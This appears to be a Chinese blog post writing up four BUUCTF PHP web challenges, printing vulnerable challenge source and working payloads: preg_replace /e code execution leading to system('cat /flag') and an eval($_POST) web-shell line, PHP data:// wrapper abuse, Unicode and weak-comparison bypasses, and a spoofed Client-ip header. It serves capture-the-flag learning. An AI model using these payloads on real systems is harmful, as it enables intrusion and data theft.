<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>BUUCTF_php - Wking&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Wking&#039;s Blog"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Wking&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="BUUCTF中和PHP有关的题目"><meta property="og:type" content="blog"><meta property="og:title" content="BUUCTF_php"><meta property="og:url" content="https://wkingxc.com/2022/02/08/BUUCTF-PHP/"><meta property="og:site_name" content="Wking&#039;s Blog"><meta property="og:description" content="BUUCTF中和PHP有关的题目"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://s2.loli.net/2022/02/14/tJXB1IyGEvM2udo.png"><meta property="og:image" content="https://s2.loli.net/2022/04/21/mVpJwXj8vWfkB5A.png"><meta property="article:published_time" content="2022-02-08T13:59:33.000Z"><meta property="article:modified_time" content="2022-02-08T13:59:33.000Z"><meta property="article:author" content="Wking"><meta property="article:tag" content="php"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://s2.loli.net/2022/02/14/tJXB1IyGEvM2udo.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://wkingxc.com/2022/02/08/BUUCTF-PHP/"},"headline":"BUUCTF_php","image":["https://s2.loli.net/2022/02/14/tJXB1IyGEvM2udo.png","https://s2.loli.net/2022/04/21/mVpJwXj8vWfkB5A.png"],"datePublished":"2022-02-08T13:59:33.000Z","dateModified":"2022-02-08T13:59:33.000Z","author":{"@type":"Person","name":"Wking"},"publisher":{"@type":"Organization","name":"Wking's Blog","logo":{"@type":"ImageObject","url":"https://wkingxc.com/img/logo.png"}},"description":"BUUCTF中和PHP有关的题目"}</script><link rel="canonical" href="https://wkingxc.com/2022/02/08/BUUCTF-PHP/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="Wking&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">时间轴</a><a class="navbar-item" href="/categories">目录</a><a class="navbar-item" href="/friends">友链</a><a class="navbar-item" href="/good_articles">精选</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/Wkingxc"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-10-tablet is-10-desktop is-10-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2022-02-08T13:59:33.000Z" title="2022/2/8 21:59:33">2022-02-08</time>发表</span><span class="level-item"><a class="link-muted" style="color:#1E90FF;" href="/categories/BUUCTF/">BUUCTF</a></span><span class="level-item">8 分钟读完 (大约1238个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">BUUCTF_php</h1><div class="content"><p>BUUCTF中和PHP有关的题目</p>
<span id="more"></span>

<h2 id="一、-BJDCTF2020-ZJCTF，不过如此"><a href="#一、-BJDCTF2020-ZJCTF，不过如此" class="headerlink" title="一、[BJDCTF2020]ZJCTF，不过如此"></a>一、[BJDCTF2020]ZJCTF，不过如此</h2><h3 id="知识点：php伪协议、preg-replace与代码执行"><a href="#知识点：php伪协议、preg-replace与代码执行" class="headerlink" title="知识点：php伪协议、preg_replace与代码执行"></a>知识点：php伪协议、preg_replace与代码执行</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;I have a dream&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;Not now!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//next.php</span></span><br><span class="line">&#125;<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>首先要绕过$text的文本判断，可以用php:&#x2F;&#x2F;input或者<code>data:text/plain,I have a dream</code> (实测后者有效，不明所以)</p>
<p>接着用base64过滤器读取next.php的源码，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$id = $_GET[&#x27;id&#x27;];</span><br><span class="line">$_SESSION[&#x27;id&#x27;] = $id;</span><br><span class="line">function complex($re, $str) &#123;</span><br><span class="line">    return preg_replace(</span><br><span class="line">        &#x27;/(&#x27; . $re . &#x27;)/ei&#x27;,</span><br><span class="line">        &#x27;strtolower(&quot;\\1&quot;)&#x27;,</span><br><span class="line">        $str</span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line">foreach($_GET as $re =&gt; $str) &#123;</span><br><span class="line">    echo complex($re, $str). &quot;\n&quot;;</span><br><span class="line">&#125;</span><br><span class="line">function getFlag()&#123;</span><br><span class="line">	@eval($_GET[&#x27;cmd&#x27;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里涉及到preg_replace与代码执行:<a href="https://xz.aliyun.com/t/2557">https://xz.aliyun.com/t/2557</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">/?.*=$&#123;执行的命令&#125;</span><br><span class="line">preg_replace(&#x27;/(&#x27; . $re . &#x27;)/ei&#x27;,&#x27;strtolower(&quot;\\1&quot;)&#x27;,$str);</span><br><span class="line">原先的语句,</span><br><span class="line">preg_replace(&#x27;/(.*)/ei&#x27;,&#x27;strtolower(&quot;\\1&quot;)&#x27;,$&#123;执行的命令&#125;);</span><br><span class="line">之后的语句</span><br><span class="line">或者构造语句</span><br><span class="line">preg_replace(&#x27;/(\S*)/ei&#x27;,&#x27;strtolower(&quot;\\1&quot;)&#x27;,$&#123;执行的命令&#125;);</span><br><span class="line">表达式 .* 就是单个字符匹配任意，即贪婪匹配。 表达式 .*? 是满足条件的情况只匹配一次，即最小匹配.</span><br><span class="line">\s    匹配任何空白非打印字符，包括空格、制表符、换页符等等。等价于 [ \f\n\r\t\v]。注意 Unicode 正则表达式会匹配全角空格符。 </span><br><span class="line">\S    匹配任何非空白非打印字符。等价于 [^ \f\n\r\t\v]。</span><br></pre></td></tr></table></figure>

<p>构造payload:<code>?\S*=$&#123;getFlag()&#125;&amp;cmd=system(&#39;cat /flag&#39;);</code>或者<code>?\S*=$&#123;eval($_POST[1])&#125;</code></p>
<h2 id="二、-ASIS-2019-Unicorn-shop"><a href="#二、-ASIS-2019-Unicorn-shop" class="headerlink" title="二、[ASIS 2019]Unicorn shop"></a>二、[ASIS 2019]Unicorn shop</h2><h3 id="知识点：unicode字符，UTF-8转码问题"><a href="#知识点：unicode字符，UTF-8转码问题" class="headerlink" title="知识点：unicode字符，UTF-8转码问题"></a>知识点：unicode字符，UTF-8转码问题</h3><p>经过几次尝试后，发现要购买第四项商品，但参数price只能接受单个字符。</p>
<p>让price传空，发现了如下报错：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Traceback (most recent call last):</span><br><span class="line">  File &quot;/usr/local/lib/python2.7/site-packages/tornado/web.py&quot;, line 1541, in _execute</span><br><span class="line">    result = method(*self.path_args, **self.path_kwargs)</span><br><span class="line">  File &quot;/app/sshop/views/Shop.py&quot;, line 34, in post</span><br><span class="line">    unicodedata.numeric(price)</span><br><span class="line">TypeError: need a single Unicode character as parameter</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/02/14/tJXB1IyGEvM2udo.png"></p>
<p>进入这个网址查找比1337大的unicode单字符即可(搜索thousand)，<a href="https://www.compart.com/en/unicode/">https://www.compart.com/en/unicode/</a></p>
<p>并将utf-8 encoding那项的0x改为%即可。</p>
<p>最终payload:<code>POST:id=4&amp;price=%E2%86%87</code></p>
<h2 id="三、-WUSTCTF2020-朴实无华"><a href="#三、-WUSTCTF2020-朴实无华" class="headerlink" title="三、[WUSTCTF2020]朴实无华"></a>三、[WUSTCTF2020]朴实无华</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-type:text/html;charset=utf-8&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(__file__);</span><br><span class="line"><span class="comment">//level 1</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">intval</span>(<span class="variable">$num</span>) &lt; <span class="number">2020</span> &amp;&amp; <span class="title function_ invoke__">intval</span>(<span class="variable">$num</span> + <span class="number">1</span>) &gt; <span class="number">2021</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt;/br&gt;&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;金钱解决不了穷人的本质问题&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;去非洲吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//level 2</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;md5&#x27;</span>]))&#123;</span><br><span class="line">   <span class="variable">$md5</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;md5&#x27;</span>];</span><br><span class="line">   <span class="keyword">if</span> (<span class="variable">$md5</span>==<span class="title function_ invoke__">md5</span>(<span class="variable">$md5</span>))</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">&quot;想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.&lt;/br&gt;&quot;</span>;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">       <span class="keyword">die</span>(<span class="string">&quot;我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲&quot;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;去非洲吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//get flag</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;get_flag&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$get_flag</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;get_flag&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">strstr</span>(<span class="variable">$get_flag</span>,<span class="string">&quot; &quot;</span>))&#123;</span><br><span class="line">        <span class="variable">$get_flag</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">&quot;cat&quot;</span>, <span class="string">&quot;wctf2020&quot;</span>, <span class="variable">$get_flag</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.&lt;/br&gt;&quot;</span>;</span><br><span class="line">        <span class="title function_ invoke__">system</span>(<span class="variable">$get_flag</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;快到非洲了&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;去非洲吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="1-intval-绕过"><a href="#1-intval-绕过" class="headerlink" title="1.intval()绕过"></a>1.intval()绕过</h3><p>经测试以下只适合php7.0及以下版本，此题同理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo intval(&#x27;5e2&#x27;); //5</span><br><span class="line">echo intval(&#x27;5e2&#x27;+1); //501</span><br></pre></td></tr></table></figure>

<h3 id="2-MD5绕过"><a href="#2-MD5绕过" class="headerlink" title="2.MD5绕过"></a>2.MD5绕过</h3><p>md5(xxx)&#x3D;&#x3D;xxx</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0e215962017</span><br><span class="line">md5值：0e291242476940776845150308577824</span><br></pre></td></tr></table></figure>

<p>两种特殊的md5，可绕过弱比较</p>
<h2 id="四、-MRCTF2020-套娃"><a href="#四、-MRCTF2020-套娃" class="headerlink" title="四、[MRCTF2020]套娃"></a>四、[MRCTF2020]套娃</h2><h3 id="知识点：php字符串解析特性bypass-传参-伪协议"><a href="#知识点：php字符串解析特性bypass-传参-伪协议" class="headerlink" title="知识点：php字符串解析特性bypass(传参)+伪协议"></a>知识点：php字符串解析特性bypass(传参)+伪协议</h3><p>参考：<a href="https://www.freebuf.com/articles/web/213359.html">https://www.freebuf.com/articles/web/213359.html</a></p>
<p>查看源代码发现：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$query</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;QUERY_STRING&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">substr_count</span>(<span class="variable">$query</span>, <span class="string">&#x27;_&#x27;</span>) !== <span class="number">0</span> || <span class="title function_ invoke__">substr_count</span>(<span class="variable">$query</span>, <span class="string">&#x27;%5f&#x27;</span>) != <span class="number">0</span> )&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;Y0u are So cutE!&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;b_u_p_t&#x27;</span>] !== <span class="string">&#x27;23333&#x27;</span> &amp;&amp; <span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^23333$/&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;b_u_p_t&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;you are going to the next ~&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。</p>
<p>要求传到服务器的信息中不能含有<code>_</code>和<code>%5f</code>，但是传参的名称是有下划线的，可以同过%20进行绕过，具体详情看参考链接</p>
<p>PHP会将<code>b%20u%20p%20t</code>—&gt;<code>b u p t</code>—&gt;<code>b_u_p_t</code></p>
<p>传递的参数不能为23333，但又要以23333开头和结尾，可以在尾部补上换行%0a，%0a代表结尾</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?b%<span class="number">20</span>u%<span class="number">20</span>p%<span class="number">20</span>t=<span class="number">23333</span>%<span class="number">0</span>a</span><br></pre></td></tr></table></figure>

<p>得到下一步：FLAG is in secrettw.php</p>
<p><img src="https://s2.loli.net/2022/04/21/mVpJwXj8vWfkB5A.png" alt="image-20220421144239827"></p>
<p>这是jsfuck编码(非常神奇)，在控制台运行后发现hint，随便post一个数据</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span> <span class="string">&#x27;takeip.php&#x27;</span>;</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;open_basedir&#x27;</span>,<span class="string">&#x27;.&#x27;</span>); </span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;flag.php&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;Merak&#x27;</span>]))&#123; </span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); </span><br><span class="line">    <span class="keyword">die</span>(); </span><br><span class="line">&#125; </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">change</span>(<span class="params"><span class="variable">$v</span></span>)</span>&#123; </span><br><span class="line">    <span class="variable">$v</span> = <span class="title function_ invoke__">base64_decode</span>(<span class="variable">$v</span>); </span><br><span class="line">    <span class="variable">$re</span> = <span class="string">&#x27;&#x27;</span>; </span><br><span class="line">    <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span>&lt;<span class="title function_ invoke__">strlen</span>(<span class="variable">$v</span>);<span class="variable">$i</span>++)&#123; </span><br><span class="line">        <span class="variable">$re</span> .= <span class="title function_ invoke__">chr</span> ( <span class="title function_ invoke__">ord</span> (<span class="variable">$v</span>[<span class="variable">$i</span>]) + <span class="variable">$i</span>*<span class="number">2</span> ); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$re</span>; </span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;Local access only!&#x27;</span>.<span class="string">&quot;&lt;br/&gt;&quot;</span>;</span><br><span class="line"><span class="variable">$ip</span> = <span class="title function_ invoke__">getIp</span>();</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$ip</span>!=<span class="string">&#x27;127.0.0.1&#x27;</span>)</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;Sorry,you don&#x27;t have permission!  Your ip is :&quot;</span>.<span class="variable">$ip</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$ip</span> === <span class="string">&#x27;127.0.0.1&#x27;</span> &amp;&amp; <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;2333&#x27;</span>]) === <span class="string">&#x27;todat is a happy day&#x27;</span> )&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;Your REQUEST is:&quot;</span>.<span class="title function_ invoke__">change</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">file_get_contents</span>(<span class="title function_ invoke__">change</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])); &#125;</span><br></pre></td></tr></table></figure>

<p>得到源码，突破点：</p>
<p>1.伪造ip：Client-ip:127.0.0.1</p>
<p>2.file_get_contents —&gt; data伪协议文件流</p>
<p>3.反写change函数，得到 ZmpdYSZmXGI&#x3D; —&gt; flag.php</p>
<p>最终payload:<code>?file=ZmpdYSZmXGI=&amp;2333=data:text/plain,todat is a happy day</code>，添加伪造ip的头信息即可</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>BUUCTF_php</p><p><a href="https://wkingxc.com/2022/02/08/BUUCTF-PHP/">https://wkingxc.com/2022/02/08/BUUCTF-PHP/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>Wking</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2022-02-08</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2022-02-08</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/php/">php</a></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><div class="social-share"></div><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2022/02/12/CTFShow-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CTFShow-文件包含</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2022/02/04/BUUCTF-sql%E6%B3%A8%E5%85%A5%E7%B1%BB/"><span class="level-item">BUUCTF_SQL注入类</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div id="disqus_thread"><noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript></div><script>var disqus_config = function () {
            this.page.url = 'https://wkingxc.com/2022/02/08/BUUCTF-PHP/';
            this.page.identifier = '2022/02/08/BUUCTF-PHP/';
        };
        (function() {
            var d = document, s = d.createElement('script');  
            s.src = '//' + 'wkingxc' + '.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();</script></div></div></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3 is-sticky"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#一、-BJDCTF2020-ZJCTF，不过如此"><span class="level-left"><span class="level-item">1</span><span class="level-item">一、[BJDCTF2020]ZJCTF，不过如此</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#知识点：php伪协议、preg-replace与代码执行"><span class="level-left"><span class="level-item">1.1</span><span class="level-item">知识点：php伪协议、preg_replace与代码执行</span></span></a></li></ul></li><li><a class="level is-mobile" href="#二、-ASIS-2019-Unicorn-shop"><span class="level-left"><span class="level-item">2</span><span class="level-item">二、[ASIS 2019]Unicorn shop</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#知识点：unicode字符，UTF-8转码问题"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">知识点：unicode字符，UTF-8转码问题</span></span></a></li></ul></li><li><a class="level is-mobile" href="#三、-WUSTCTF2020-朴实无华"><span class="level-left"><span class="level-item">3</span><span class="level-item">三、[WUSTCTF2020]朴实无华</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#1-intval-绕过"><span class="level-left"><span class="level-item">3.1</span><span class="level-item">1.intval()绕过</span></span></a></li><li><a class="level is-mobile" href="#2-MD5绕过"><span class="level-left"><span class="level-item">3.2</span><span class="level-item">2.MD5绕过</span></span></a></li></ul></li><li><a class="level is-mobile" href="#四、-MRCTF2020-套娃"><span class="level-left"><span class="level-item">4</span><span class="level-item">四、[MRCTF2020]套娃</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#知识点：php字符串解析特性bypass-传参-伪协议"><span class="level-left"><span class="level-item">4.1</span><span class="level-item">知识点：php字符串解析特性bypass(传参)+伪协议</span></span></a></li></ul></li></ul></div></div><script src="/js/toc.js" defer></script></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="Wking&#039;s Blog" height="28"></a><p class="is-size-7"><span>&copy; 2023 Wking</span><span id="timeDate">载入天数...</span><span 